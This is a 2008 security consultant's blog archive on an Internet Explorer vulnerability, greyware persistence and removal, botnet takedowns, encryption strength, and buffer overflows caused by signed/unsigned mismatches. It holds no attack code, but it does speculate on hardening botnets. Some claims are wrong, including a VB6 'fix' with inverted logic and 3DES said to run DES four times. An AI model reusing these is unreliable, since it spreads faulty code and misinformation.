Tuesday 16 December 2008

Microsoft Security Advisory 961051

There is a lot of chatter around at the moment about a security vulnerability in all versions of Internet Explorer. What seems to have happened is:

1. Someone found a remote code execution vulnerability exploitable from IE.

2. Someone packaged a malware to install via this vulnerability. At the moment, the reports say that it is stealing game passwords but hey, if the bad guy can run arbitrary code then it could do more than that. The malware is not being recognised by much at the moment and could change at any time. The malware seems to have an all numeric name and load into svchost.

3. Someone hacked a bunch of websites to include malicious content. In most or all cases, this was done using a SQL injection attack. It continues to amaze me that there are still sites vulnerable to this class of attack as a trivial code review can find that type of flaw.

So, the situation as I write is that all versions of IE are vulnerable to this form of attack but you probably could not get infected via an HTML email because scripting is disabled by default and because on Windows Server 2003, 2008 and Vista, the rights used for HTML displayed in the mail client or the browser are so reduced that the malware shouldn’t be able to hook itself in.

Now, Microsoft are calling it an IE vulnerability but the mitigation advice includes unregistering oledb32.dll which suggests that it isn’t IE that is at fault – it is just passing along information from a script and the underlying OS has an issue. Now, if that is the case then I would be willing to bet that this was exploitable from Office as well but there are no current reports of this. The advisory also says that the issue is with data binding. Since OLEDB is a COM DLL and there is no direct way of calling into a DLL from Jscript anyway, the exploit is going to look like a couple of data binds, sharing an object of some sort. There won’t be an external database, just some XML embedded in the HTML.

One of the mitigations that Microsoft are offering is to turn on DEP which means that this has to be an old school exploit involving a stack overrun so you shouldn’t expect to see a separate payload on the heap. The installation code should be right there in the XML.

So far, there is no clear pattern as to what sort of sites are hosting this. A Chinese motherboard manufacturer, some porn sites, a Taiwanese search engine and a couple of sites in HongKong, most of which are in Chinese. Spotting a pattern? The hackers can speak Mandarin. What is being stolen? World of Warcraft passwords among others. I would suspect that a gold farming operation has decided to expand.

Much is being made in the press about how open Microsoft have been about this vulnerability and some people have drawn the conclusion that this is an especially bad vulnerability. Hmmm, does that bear up to examination? Remote Code Execution vulnerabilities are fairly common in all browsers. MS08-052 patched an important one in GDIPLUS, a much patched component. MS07-055 was another, that time in the vector markup parser – and again, it needed repatching later that year because the same errors were found in other code in the same module. MS07-045? Some were patched there too. MS07-058 also resolved remote code execution vulnerabilities accessible via Internet Explorer. On a technical level, the only unusual thing is that this particular vulnerability doesn’t need a separate payload on the heap. This one is only unusually bad because there are exploits on the web for it.

Signing off

Mark Long, Digital Looking Glass Ltd

Saturday 13 December 2008

Performing to expectations

There are good and bad points about running a small consultancy. I would like to focus on one of the good things though. If I can steal a quote from an old American Theatre manager, “Every day, the same thing. Variety!”

So, last week was largely involved in coding in good old VB6. This past week has been partially spent writing a guide on securing home PCs to protect children and bank details. However, I also did some work on how to troubleshoot performance issues for some people that didn’t want to hire outside talent for the work but needed the skills. That is OK with me. I always enjoy mentoring and teaching. I thought that it would be good to share the basics with a wider audience so I will blog about it here.

There are a couple of odd things about performance tuning. The first is that the law of diminishing returns tends to cut in long before you reach the theoretical limit. There comes a time when the cost vs benefit equation comes out against further change. The second is that it frustrates managers for reasons that will quickly become apparent.

So, the first step is to find the bottleneck. Are we memory bound or CPU bound or I/O bound – and with virtual memory, memory bound can add to I/O bound.

Memory bound applications are not quite what they used to be. When I was a kid, I had an Acorn Atom. In fact, I had the world’s fastest Acorn Atom since I had replaced the 1Mhz 6502 with a 2Mhz 6502A which I ran at 4Mhz using a bolt on heat sink (rare for processors in those days) and a 5V line running at 7.2 volts. That puppy used 2114L RAM chips each of which stored 1K bits. Put 8 of them on a bus and you have 8K bytes of memory. Each of those cost £24 at the time. I see that they are now available from specialist dealers for £1.40 but we are talking about 1980 money so we are talking £83 for 1K bit or £664 (about $992) for 8K of memory.

These days, you can get 1GB for less than £17 so the problem is normally not that there is not enough memory to back up the address space but that there is considerable contention for the memory. A prime candidate for this sort of problem is a server used for multiple purposes. Small Business Server has to be a domain controller and an IIS box and an Exchange Server and a SQL Server host. That is a lot for one box. Adding a memory hungry application is not going to help matters at all and most people don’t try. However, you often see IIS and SQL Server on the same box and both are big users of memory. While Server 2008 has made some improvements in this area and 64 bit servers are more common, there are still a lot of applications that hit problems. The key is looking at the page faults per second. The number will vary depending on the application but if they look too high then you probably need to tune the memory and give yourself some head room if such a thing is possible within the address space restrictions. The ASKPERF blog discusses this in much more detail. Oh, and overworked .NET apps tend to use a LOT of memory because the garbage collection get starved. Always looks at workload first with them.

CPU bound processes are perhaps more interesting. As always, Perfmon is your friend and you can get a lot of information from looking at thread activity and percentage of time in kernel mode. However, please be aware of something very important. These figures will be best estimates. They can’t be taken as gospel. Apps that thrash the CPU fall into two camps. Those that really are that CPU intensive and those that are doing unnecessary work. Calculating Pi to a million places is CPU intensive. Cracking codes is CPU intensive. If you are serving web pages or doing database updates or something which isn’t number crunching, then it shouldn’t be that CPU intensive. You need to discover where the CPU is being wasted. Heap management is a classic. If you fragment the heap badly by using sloppy memory allocation and deallocation, well, the heap manager will spend a lot of time cleaning up. Consider object brokers as they are often the answers. Do you have too many threads? For CPU intensive tasks, you should have fewer threads than for I/O bound tasks. If we are talking about a database server that waits for the DB to return records which are then processed then 50 threads per CPU might well be perfectly healthy. If you are crunching through large arrays then 5 threads per CPU might be too many. Please remember that thread switching is not free. Oh, and if your process is spending too much time in Kernel mode then you might want to consider what drivers you have and what you are asking the system to do. Finally, you might have to hand tune code to make it more efficient. I discussed this back in 2005.

I/O bound processes spend most of their lives waiting. Typically CPU utilisation will be low. There are really 2 approaches here. The first is to speed up the I/O operation. Disk transfer times vary between 45MB/s to 3GB/s and seek times vary from 2ms per seek to up to 15ms per seek. Faster hardware can make a big difference, especially if the hard drive has a decent cache buffer or if you can cache in software. Faster network links can help too. The other approach is to minimise I/O by careful caching of data. A small read only table may as well be held in memory. There is no need to pull back more fields from a database than you will use. You could even look at offloading reading and writing to another process in some cases. Typically, you need to consider more than one of these options.

So, why does this frustrate managers? Well, because there is no clearly defined end to this process, there is no specific end date by which you will have results. Try putting that on a Gantt chart! The other reason is that progress is very non-linear. You find a bottleneck and fix it. You immediately hit a second bottleneck. You fix it. If you have chosen well, initial progress is rapid. Because of the law of diminishing returns, you will make less dramatic improvements over time. The manager gets to see less and less success over each iteration. To many people, that seems like you are getting worse at what you do so that is one to message carefully.

I hope that this helps someone

Signing off,

Mark Long, Digital Looking Glass Ltd

Wednesday 10 December 2008

Are two better than one? Not always, IMHO

Although selling advice is what I now do for a living, I try to help out on the newsgroups as much as I can. I am a firm believer that you have to give something back as well as taking. I am no doctor or spiritual leader. I am a technical type. I give technical information.

One question that I answered on a newsgroup involved a very routine malware infection and there was a free anti-malware product that would remove it to a reasonable level of certainty. I recommended uninstalling the previously installed anti-malware solution first. Some people contacted me to say that they didn’t agree with that advice. Well, that is fine. Disagreement can be good. However, I disagreed with their reasoning. They argued that 2 anti-malware products would offer better protection. At most, one should be turned off during the scan, they suggested.

The reason that I recommended uninstalling as opposed to “turning off” the existing checker was that anti-malware programs typically work by inserting redirects into a thing called the kiServiceTable in the interface between the user mode functions OR by subverting the function starts in the kernel functions reached from the kiServiceTable. They do this so that they can monitor the system activity by monitoring the requests made. This is a good technique but there is no safe way to reverse it since there is no built in synchronisation that allows you to pause all kernel operations while you effectively rewrite the kernel. Accordingly, turning off a malware checker doesn't always unhook it from the system. It just causes it to ignore whatever it sees. So, disabling an AV product is not the same as removing it.

Now, anti-malware products work by subverting the system, by getting inside the internal functionality of it and modifying its behaviour. Ok, this is good and proper and done for the good of the user, more or less with his or her consent. However, malware does the same thing for malicious reason without the user’s informed consent. Her we have a competition. Everyone wants to be the first to subvert the system – as the saying goes, he who hooks lowest wins. When you are at the same level, the first is effectively the lowest level hook because it can control what happens after this point. If an anti-malware program finds that there are already hooks in place that subvert the system, what will it do? Well, it might set up a chain were one checker is called after the other in which case things work but it is a bit slow. That can happen accidentally if they use different hooking strategies. Alternatively, the second program to run might override some of the redirection and consider the other anti-malware as possibly hostile. You could and sometimes do end up with some system calls monitored by one program and others monitored by a second program.

So, what actually happens when you have 2 anti-malware programs trying to do the same job? No-one knows. It varies according to what decisions the programmers made and what order they start. Was that combination tested? It seems unlikely. If the products were tested together, were these versions tested together? Almost certainly not. It is normally considered “an unsupported scenario” which is code for “We don’t know what will happen or we expect it to break and don’t care”.

Are you much safer with two, assuming that they work? Not so much. Virus signatures are shared (using the Virus Information Alliance), anti-malware checkers with up to date signatures typically detect pretty much the same subset of malware as each other and fail to detect pretty much the same subset. Accordingly, the gain from running two is marginal at best even if they do play nicely together and that is uncertain at best. Of course, if one of the programs were much weaker than average then the second could help but why would you be running a lame antivirus in the first place?

I don’t know of any cut and dried research on this though. As stands, it is just my professional opinion. So much of our work against malware is at the limits of knowledge because each week, there are new variants and new exploits. Several times each day, vendors release new signatures. The industry is running as hard as it can to keep up and frankly, it is losing. Infections are up 100%. Spam is up more than 90%. In such shifting sands, a best guess is often all that you have.

We live in interesting times and the road promises to get bumpier before it smooths out

Signing off,

Mark Long, Digital Looking Glass

Wednesday 3 December 2008

Bugs, threats and seasonal events.

As I write, I am still warming up after a very unsuccessful attempt to get to London by train. An hour and a half waiting on a station platform gives plenty of time for thought but my fingers were soon too numb to use my PDA.

In a break from tradition, I am going to name and shame someone responsible for a bug that I recently was involved in fixing. This was one of mine and was interesting because it was rather subtle. It was in some VB6 code that I wrote the other day and was of the form

If Len(txtSomething) And Len(txtSomethingElse) Then
   cmdOK.Enable = True
Else
   cmdOK.Enable = False
End if

So, the idea was that a button is only enabled if there is text in both fields. I am a big fan of not letting people make errors in the first place if possible. I had thought (correctly) that len(whatever) would give 0 (false) or something else (true). The code worked most of the time. It took me a second or two to work out why. Compilers use a lot of state machines. In this case, the state that the parser was in when it got to this code was that it was expecting a boolean. What I had given it was a pair of integers. It would have interpreted one as a case for coercing the type and handling the integer (the result of the len function) as a boolean. Was there any way of making “integer and integer” into a boolean? Why yes, there was. VB doesn’t make a distinction betweens logical and boolean And. They use the same keyword unlike C which uses && and & respectively. Now,maybe this was a good decision and maybe it wasn’t but it was one that I should have remembered. As written, the code was ambiguous and the parser went for the simpler option. 12 & 8 == 8 is non-zero so the control was enabled. 8 & 4 == 0 so it was disabled. A less ambigous bit of coding would have been

cmdOK.Enable = len(txtSomething) * len(txtSomethingElse)

but I couldn’t bring myself to write such unintuitive code and a multiplication for a boolean operation seems wasteful although it would have made no actual difference in this case. The best coding would have been

cmdOK.Enable = (len(txtSomething)=0) And (len(txtSomethingElse)=0)

As for threats, it seems that that SRIZBI is back on the air. The bot and the bot master had a trick up their sleeves that the security community had not expected. If the bot is unable to contact its command and control channel, it generates a url mathematically and refers to it for instructions. The bot masters had the URL ready and most of the botnet was picked up again on schedule. I have to applaud our Russian friends for that. Fortunately, it is relatively simple to simulate the loss of a command and control system in the lab so we can anticipate where they will go to next time. I still think that a peer to peer system like Storm used is the way to go in the long term. Oh, and a big hello to my readers at the Washington Post. You heard it here first.

In other news, Apple are now recommending Mac users to install some kind of anti-virus product. Previously, their recommendation was that the threat was insufficient to warrant the potential downside of having an AV solution. The world is getting more dangerous, folks.

Oh, and there seems to be a lot of buzz about an enterprise information security package that contains rootkit like technology in a Chinese written module. Some of the AV vendors are detecting it as malicious. Well, it could be but it is hard to know. Increasingly we see security tools that resemble malware more closely as they try to hide from each other. The malware wants to disable the AV product and the AV product wants to disable the malware. It sounds like the new rootkit uses function redirection so the old Rootkit Unhooker tool should detect it.

Well, back to coding. You have to love feature creep.

Signing off

Mark Long. Digital Looking Glass

Monday 1 December 2008

A trip down (not much) memory lane

As regular readers of this blog (and thanks to all of you for reading by the way) will know, I debug code, review code and reverse engineer malware. Debugging and security for fun and profit. Well, I find it fun at any rate and it is my business so I take what profit I can in these difficult days. However, I have spent the last few days coding until the small hours which is something that that I don’t generally do that often.
 
As always, no names and no pack drill. My customer had bought in a solution that was a perfectly good solution except that it was designed to be single user with that one user having compplete control over all aspects of the data. There is nothing wrong with that except that it was needed to work with 70 users, of which 69 would have limited abilities to change the data. I was called in to see if I could make one thing into another.
 
It was clear from the start that the answer was “No, sorry, not happening”. However, that left my client in the lurch as they were hard up against a deadline. They need a solution and they needed it in a hurry. It had to run on low end XP equipped laptops with older versions of Office and couldn’t require any installation. Oh, and I got the specification (on the back of an envelope) on Friday night and it needed to be running for training on Monday and in production for Tuesday.  Clearly, that was going to be a challenge – and it had to match the look and feel of the previous solution.
 
Tricky, eh? .NET was out because the systems didn’t have the required runtime and installation was a problem. Pure C++? That would do the job but a fully functional system in less than 72 hours? Maybe there were people who could have pulled that off but not me. Java? JVM not installed. This wasn’t looking good. So, it would have to be something where all the required files were part of the OS.  Hmmm… MSVBVM60.DLL ships with the OS. ADO ships with the OS. I could write it in VB6, an old, old friend of mine. I wouldn’t have any OCX controls to use but I could write controls in the project if needed.  It is a RAD environment and that would help a lot. Yes, I could get the customer out of a bind here.
 
Ok, I haven’t had a lot of sleep over the weekend but I wouldn’t be writing this if there was still a problem. Yes, it is an old technology. It has its limitations. It got the job done nicely though.  I was a bit concerned that I would see repeated reloads across the network from the application EXE (it was a single file run from a share) because the memory would be considered discardable. However, I stopped worrying when I built for release. The executable was 60K long. No, that isn’t a typo. It was less than 64K on disk and even with the recordsets and ADO was still less than 5 MB in memory. 4 Polymorphic forms that pretend to be several more with some control hiding, some validation code, a lot of custom UI code and some fairly unremarkable ADO code and it had a tiny footprint. The customer wanted their logo added (another 6K) and an attractive high resolution icon (64K) bringing the total to just under 128K. I can live with that level of bloat.
 
There are a lot of cool things about the new languages and for serious development, you have to be impressed. That is not to say that old school doesn’t sometime get the job done just fine.
 
Signing off
 
Mark Long,  Digital Looking Glass Ltd
 
 

Friday 21 November 2008

Encryption - How much is enough, how much is too much?

You might expect me to say that everything should be encrypted to the hilt. Well, that would be overkill. No, the trick is finding the right level of encryption.

I have been asked in the past what would happen if someone came up with an unbreakable code. Would that be game over for Cryptanalysis? Well, I confess that I am not a specialist in crypto but I feel pretty secure in answering this one. No, it would not be game over because there are already unbreakable codes. One time pad codes are unbreakable without the message pad because all possible messages are equally possible – the same cypher text (encrypted version) could decrypt to “Move $1 million to account 43445342” or “I want to buy a painting of a goat” and there is no way to tell which from the cypher text. The way to attack those would be to try to recover the pad - the sequence of nonsense that was used to code the plain text into cypher. That could be a very private thing such as a sheet of rice paper held by only two people in the world and eaten before the attempt by a third party to decrypt the code was made. It could be very public such as letters from a book chosen at random – each day, you advance one page. One of my favourites one time pad codes is the Solitaire Cypher where the order of a pack of cards is used to cypher text. It isn't perfect because the pad repeats but it was a war time favourite because the equipment required was a pencil, a bit of paper and some ordinary playing cards. Shuffle the deck and the key is lost forever.

However, I digress. Popular codes used today are things like 3DES (sometimes pronounced Triple-DES) and AES 128 bit or 256 bit. 3DES is very big in the financial world and replaced single DES. Essentially, 3DES does what DES does 4 times, processing its own output. Are they unbreakable? Not quite. DES is fairly easy to break with the right kit. 3DES would just take longer and require more kit. AES256 would theoretically take many millions or even several billion years to crack with a single desktop system – although the 1.105 petaflop/s IBM supercomputer at Los Alamos National Laboratory might manage it a darn sight quicker. Even with that, the process would, on average, take thousands of years. Does your data need to be safe for that long?

That turns out to be one of the important questions. Imagine you are choosing encryption for a password that will be sent across the wire – and let us ignore the use of hashes for the moment. A password is valid for 1 week and then must be changed. The user can change their own password for 1 week after the old password expires. After that, the help desk have to do it. If the encryption is good enough to stand up for more than 2 weeks, then it is good enough. Making it tougher adds nothing. However, the location of a vault is unlikely to change for hundreds of years. That needs to be secret for a lot longer.

Another important question is how sensitive the data actually is. What I bought on Amazon in the last year? You can see that if you want. A trivial encryption such as ROT13 will do the job here. My interactions with my bank and my lawyer? That is more sensitive. 3DES at least. The launch code for ICBMs? Even if they change fairly often, I think that we should use a good strength cypher on those!

However, there is something about encryption that people often don't consider. It does more than hide information from prying eyes. Imagine that I am running a client that is having a conversation with a server. The request is going over the wire, perhaps via SSL, perhaps via some other scheme. I make a request and the request is coded with a shared secret key that we exchanged at the start of the session – and which is only valid for this session. I get a reply and it is junk until it is decrypted using the shared secret. There is nothing odd about that at all. Millions of systems work that way. So, what would happen if someone tried to hijack the session and inject a new request? Unless they have the shared secret, their request will be decoded into meaningless goo. Since the request probably contains an encrypted copy of some sort of sequence number, it would probably fail at the first hurdle. Knowing the shared secret is a big part of proving that I am still the client that I was at the start of the conversation.

How about if an attacker tries to replay a recording of the conversation without understanding it? The shared secret is generated per session. They have the wrong one so the replay would fail very early. A well designed protocol can protect pretty effectively against session hijacks but there are always people out there looking for even the narrowest gaps to exploit.

What are the downsides to encryption? Well, they are several. It takes time. If you are reading from a disk encrypted with BitLocker, each byte read from disk will cost you around 30 additional CPU cycles – and blow your processor cache and pipeline. Ok, that is not the end of the world but it is a cost. How about data loss though? Bob has excellent data security. All of his files are stored on a machine protected by Truecrypt, all of his mail goes via PGP and all of his ZIP files and documents have strong passwords. If Bob is a paragon of virtue then then risk is that he will be hit by a bus and that data will be lost. That could be very serious indeed. Of course, it might be that Bob is not a paragon of virtue in which case, how would anyone find out?

I recall that the police were not at all happy when BitLocker came out. Several of them at the F3 conference (First Forensic Forum) described it as a paedophile's best friend since it made offline forensics so hard to do. Encryption is a tool and like pretty much all tools, it is morally neutral. It protects good and bad people equally well. Some would argue that those who have nothing to hide need not keep secrets but I am not so sure. If I share my data with (for example) the government because it is not encrypted from them then I am relying on their ability to keep my data as safe as I have or better. Given their past performance on this, I think that I will encrypt it myself, thank you.

Signing off

Mark Long, Digital Looking Glass

Monday 17 November 2008

Ooh, ooh, ohh, ohh, Staying Alive!

Ah, who can forget the BeeGees? I try and try. No, there is a point to the title of this blog entry. If you work with computers (a fairly safe assumption if you read this blog) then you will doubtless be familiar with the casual “You know, my computer has been acting weird. Would you mind having a look at it?”. There is a song by Tom Smith called “Doing tech support for Dad” about it. Guess what I did at the weekend? Sometimes I am lucky and the person has some interesting malware. In this case, it was interesting greyware.
 
Now, is greyware a class of malware? Back at Microsoft, the lawyer approved phrase was “Potentially unwanted software” because it was often software which had been installed after the user agreed to some Eula that said on page seven that it might just send your details of your web usage to a server somewhere and might show you ads for products of dubious authenticity. The lawyer’s position is that you can’t call it malware if the user agreed to install it.
 
So, what did we have here? A typical family system running XP Home edition, not too much memory and an older specification with all members of the family being admins on the system. Under the circumstances, the machine was remarkably clean. It was running a free AV product that had picked up that one of the DLLs loaded into every process was dodgy but every time it tried to fix it, it failed.

I spent a good few hours looking at this particular greyware (and for legal reasons, no names will be given here) and it was a resilient little devil. I would like to talk about some of the tactics that it used. However, before I do that, I would like to talk about coding styles in malware.
 
There are some fairly distinct styles in malware writing. The Script Kiddie and those just up from there typically lash components from different sources together into a crude botch and you can’t tell much about the kiddie. Eastern Europeans black hats are quite workman-like and the code quality is generally pretty good. They have clearly had formal training. They often borrow ideas off other malware writers, possibly those working for the same stable but I suspect that they pinch ideas off rival gangs just as often. They keep up with modern trends or set them. They generally write stealthy code with some excellent use of rootkits. Conversely, they do relatively little to hide their infrastructure and looking at the network activity generally takes you to Russia or the Ukraine in fairly short order. That could well represent a difference between the developers and the money men who coordinate gang activities. I am told that military malware from Eastern Europe follows the same patterns but it is better engineered and doesn’t lead as directly back to Eastern Europe. I have only seen a fairly limited range of military malware from the Middle East but the quality was excellent and the stealth features were even better than the Eastern European code. They clearly worked in teams with subject matter experts writing different bits of the code. A lot of money had been spent on those projects. Chinese malware uses a very different approach. It rarely has much stealth capacity. Instead, it overwhelms by sheer weight of numbers. If two variants of the code are good, then ten  are better. If one protection mechanism is good, then five are better. I am told by friends who move in places where true names are rarely given and all the players work for organisations known only by 3 letter acronyms that Chinese espionage works in very much the same way. Ten agents watching are better than two.
 
Anyway, I digress. This greyware proved to be Chinese and I had guessed as much from the approach. The directory where it lived was visible which made life easy… well, actually, not so much. Any attempt to delete the directory failed with a sharing violation if it was a code component – oh, I may just call any such files “PE files” which stands for Portable Executable. This covers any sort of file that can be loaded as run as native code. So, something was locking the files. A quick search showed a process that was loaded from the directory that the other known files were from so I tried to kill it with task manager but it wouldn’t die. Ok, time for the toolbox to come out. Although Sysinternals is wholly owned by Microsoft, the tools are still free and wonderful. I downloaded them and Process Explorer killed the process just fine. It was offline for less than 5 seconds before it popped up again. A check of the parent process showed it to be an instance of SVCHOST. Right, it was time to look at the services.
 
There were a couple of services that seemed to be stopped… how could a stopped service be doing this? I downloaded WinDbg and had a look at the service host for that service and clearly it was not stopped. I am going to look into this technique some more when I have time but it is clear that the SCM was sending service control messages which the service claimed to be processing but the status codes that it returned were out and out lies. However, that was not a problem. I could force terminate the containing service. It popped back up again, spawned by another instance of SVCHOST. Ah, ok, I had seen that trick before. Two processes each have a thread that waits on the death of its brother process. If you kill one then the thread unblocks, restarts its brother process and blocks again. The brother does the same. I knew how to deal with that thanks to Mark Russinovich, a very clever and helpful chap who it was my pleasure to meet once or twice. You can suspend all the threads in a process and that doesn’t trigger the brother process – after all, the monitored process is only sleeping, not dead. You suspend the other process and you have two frozen malicious processes. I went into the registry and killed the startup for those services and rebooted.
 
What the heck? Everything was back as it had been. Some investigation showed that there was a process that “repaired” the installation of the malware on each boot and then terminated. Ok, not a problem. I froze everything and used Autoruns to disable the loading of the process. Reboot – and everything is back as it had been. Resilient little sucker, isn’t it? Some ferreting around showed that this greyware registered as a shell extension and may well have had some shell functionality but the first thing that it tried to do was repair the install. It was at this point that I realised that this was more interesting than average. I started to dig deeper.

COM classes were registered with multiple different class IDs. Whichever you asked for, you got the same VTABLE. Cute. There were multiple self repair mechanisms and hooks into the system which seemed to exist solely to give the greyware a chance to self repair. Nice idea. The one that made me laugh was the protection for non-PE files. Something was waiting on each file in the directory and as the file was deleted, it just copied the file from the complete backup directory that was right there in plain sight. What happened if you tried to kill the backup directory? It was restored from the live copy.

So, the approach was clearly Chinese but the modules were compiled in Visual Studio with US settings. I was able to fish out some function names and other text and the writer clearly had a very good grasp of English. The servers that sourced the ads were in mainland China and some of the reporting went to Taiwan. All in all, this was pretty good work and much more resilient than most. There was no way that an average admin would have been able to remove this software.

In the end, I cleaned the system by booting to a WinPE image and manually cleared out the registry and deleted the directories that contained the greyware. Even the best self defence mechanisms don’t work when they are not loaded.

Had it been a commercial system, it would probably have made more sense to salvage the data and rebuild the box.
 
Oh, in other news, Arbor Networks say that there have been more and heavier distributed denial of service attacks this year than ever before with a peak intensity 67% above the previous high. The source? That would be Botnets… generally compromised home systems just like the one that I worked on this weekend.

So, until next time…

Singing off

Mark Long, Digital Looking Glass
 

Friday 14 November 2008

Directions in cybercrime

Something is missing today. What is it? Hundreds of millions of unwanted SPAM emails. A California based hosting company, McColo Corp, had their servers blocked from the web and the volumes of SPAM nearly halved. The move seems to have been largely orchestrated by journalists and Google.

Google has a cached copy of the McColo terms of use. The following (copyright McColo and quoted as fair use) is from there:

I) Prohibited Uses
A. Utilize the Services to send mass unsolicited e-mail to third parties.

B. Utilize the Services in connection with any illegal activity. Without limiting the general application of this rule, Users may not:

(i) Utilize the Services to copy material from third parties (including text, graphics, music, videos or other copyrightable material) without proper authorization.

(ii) Utilize the Services to misappropriate or infringe the patents, copyrights, trademarks or other intellectual property rights of any third party.

(iii) Utilize the Services to traffic in illegal drugs, illegal gambling, obscene materials or other any products or services that are prohibited under applicable law.

...

(viii) Utilize the Services to distribute, advertise or promote software or services that have the primary purpose of encouraging or facilitating unsolicited commercial e-mail or spam.

(ix) Utilize the Services to solicit or collect, or distribute, advertise or promote, e-mail address lists for the purpose of encouraging or facilitating unsolicited commercial e-mail or spam.

(x) McColo has no restrictions on contents. Adult materials, MP3s, games, and audio/video streaming are permitted. However, customers are strictly prohibited from using egg-drops, IRC bots, warez materials and shell hosting services on McColo regular network. IRC BOT controllers are not allowed on both networks.

Oh dear... It seems that they have not been enforcing these very well at all. It seems that IRC traffic used to control the botnets has routinely been routed through McColo servers. Host Exploit are making a lot of the running on this one and they claim that the payment servers for at least 40 child porn sites are being run through McColo. McColo have no restrictions on content indeed. Here is a link to a Washington post document listing what McColo have apparently been up to. SRIZBI, the world's biggest botnet, is on there and is apparently currently uncontrolled.

An earlier disconnection (technically a depeering) of the Atrivo / Intercage servers produced a short term drop of 10% in SPAM. How short term? About 3-5 days. I would expect th drop caused by taking McColo off the air to to take a little longer because there are presumably more botnets being controlled. So, what happens next?

In the short term, I see a scramble to regain control over the botnets that have been severed from their command and control systems. We may even see some of them change hands although it is increasingly clear that many of the individual gangs ultimately serve the same master.

What about the longer term? Well, I would have thought that the gangs behind the SPAM engines would be looking to safeguard their operations. In the past, the IRC control channels (and there are other channels which I can discuss if anyone is interested)have tended to go via smaller independent IRC servers who have been reluctant to terminate the control channels since this often earned them a DDOS attack - that is to say that the botnets would be turned on them as punishment. Attacks against the control channel have largely been limited to killing the channel and hoping no-one minded all that much. By taking out whole server farms at a stroke, things have ratcheted up a whole lot. I would have thought that the botmasters would be looking to move their command mechanisms somewhere much more under their control. Emil Kacperski who ran the Atrivo / Intercage organisation and Vladimir Tsastsin who ran EstDomains may or may not have been associated with the known rogue Russian Business Network - who am I to want a libel case? Certainly, many of the operations that McColo have been hosting were formerly hosted or controlled by the now depeered Russian Business Network. So, moving operations into the west was a solution to a previous problem.

This makes things interesting. If the illegal parts are all in Russia, Estonia and the Ukraine, it is fairly easy to target them as they are concentrated in one geographic area and it is possible to effectively filter traffic although not necessarily good for international relations. If they are centered in the west then the legal framework makes it easy to shut down the operations and that is not what organised crime wants. China? They have their own agenda and it would be even easier to filter the traffic. Africa? Not a lot of bandwidth in the less controlled areas and too much law in the well controlled bits.

Now, what would I do if I were a cyber criminal? Well, they keep knocking out my single points of failure. That happened before so they built in mechanisms to cope with the loss of a single IRC channel. Now the opposition are axing whole server farms. Maybe it is time to abandon centralised control in the same way that the STORM botnet did. Ok, STORM was effectively killed by the Microsoft Malicious Software Removal Tool but it took a long time to die. What if there were multiple STORM type peer to peer botnets? Presumably Microsoft would still kill them off and they would have a limited lifespan - but isn't living defined as not dying for one more day, every day? That is what I would be working on if I were a black hat.
As for how the payment side for illegal content, I wouldn't like to guess how that will be done. All that I can say is that we are living in interesting times indeed.

I was asked a question by a client this week. She wondered what I thought the effect of the recession would be on cybercrime. Clearly, legitimate business is having to tighten their collective belts. Traditionally, SPAM has been used to sell fake medications, specifically Viagra and Cialis and dubious services such as penis enlargement guides. These can be seen as luxury goods. We may see the mix changing and adverts for treatments for high blood pressure and other necessary medications may start to dominate. Much of the Viagra sold over SPAM is fake and has never seen the inside of Pfizer's plant. What would happen if people bought fake medicines for life threatening conditions? You know that criminals would sell them.

As for more targeted attacks such as industrial espionage, well, the criminals will do what we all do when profits are lower. They will work harder.

Speaking of which, I have a report to write.

Signing off

Mark Long, Digital Looking Glass

Wednesday 12 November 2008

Hey, it is only a warning. How important can it be?

Caveat – only of interest to C or C++ devs today.

You might think that compiler warnings are just nagging. Well, that is mostly true. If you are in a relationship, you may well have been nagged to do the washing up or empty the kitchen bin at some point. Some nagging has a point.

I am going to be talking here about the Microsoft compilers because those are the ones that I know best but the same principles apply to other compilers and even code checkers like Lint. Ah, those happy days when we could name tools in ways that amused us. Lint picked fluffs from your code and you used DDT to kill bugs. Anyway, I digress. Compilers allow you to set the warning level that they compile your code against. If you do certain things, you will get warned. I want to talk about some of those warnings.

So, let us look at one that it is probably OK to ignore:

Compiler Warning (level 4) C4201
Error Message : nonstandard extension used : nameless struct/union

Ok, this just means that you have used something which is not supported by ANSI C++. Maybe you need this to be multiplatform in which case that is probably a bad thing. Maybe you plan to change compiler at some point in the future (which I only recommend for masochists) and you want the code to stay as portable as possible. Maybe your contract demands that you use ANSI level C++ for compliance reasons. This is a minor warning but there are some pretty good reasons for at least considering what it is telling you.

How about one that we should worry about?

Compiler Warning (level 3) C4018
Error Message: 'expression' : signed/unsigned mismatch

This one has some brothers and sisters but they have the same basic pattern. You treat something as a signed and an unsigned value. Ah, but you know that the value will only ever be 0 to 40 and so what does it matter? Well, quite a bit. Let me explain how.

Imagine that we have an application that reads a data file and makes sense of it. There are millions of applications like that. So, the data is coming from a file. Further imagine that we have a buffer which is 100 bytes long – it is char[100] so element 0 to element 99 are fine. We are going to fill it from a structure that has been passed to us. You have an integer which holds the length of the buffer and a pointer to part of the file. You check that the length is less than 101. Yes it is. You read that many bytes and copy that many bytes into the array. You go on and do the next thing. All is well and there are millions of bits of code that do just that.

Why do you check the length? Because you don’t want to overflow the buffer. However, what happens if the length that is read from the file is -10,000 rather than 42, for example? Well, -10,000 is less than 100 so that check works fine. The routine that reads the file takes an unsigned value so -10,000 becomes DF80, a much larger number, 55536 to be precise. So, you read 55536 bytes from the file and copy it into the 100 byte array. Oops, that is the stack gone. If you are lucky, you will crash and your user will curse your name. However, that could only happen with a corrupt file since you also write the files and there are never negative lengths in there. It is, accordingly, a purely theoretical risk right up until someone writes a malicious file and mails it to your customer. Odds on, this will be remote code execution vulnerability. It happened with dozens of products including Abobe, Microsoft and many other household names. Linux and Unix have both had this one over and over and smarter people than me missed it.

My recommendation is that you compile all production code at the maximum warning level and document any warnings that you can’t get rid of. I would even go so far as to say that compiler warnings should be logged as bugs so that they get fixed in the next version. You might think otherwise and that is your right... and I will sell you or your client my services when you or they hot problems as a result

Signing off

Mark Long, Digital Looking Glass

Thursday 6 November 2008

Drive-by attacks, not just for the physical world

Drive-by attacks are a common way of infecting home PCs. I have mentioned them before but they are still just as popular as they were. There seem to be some changes in the approach though.

We used to routinely see attempts to infect PCs via remote code execution vulnerabilities in the browser – this was one of the holy grails for black hats. If you had one of those, you could have a “click and you are owned” scenario. The other holy grail was a remote code execution in a service that allowed anonymous exploitation – that is to say that a particular request could be made without needing to be sent from an authorised domain account This would enable a black hat to write a worm but I digress; we are talking about Drive-by attacks.

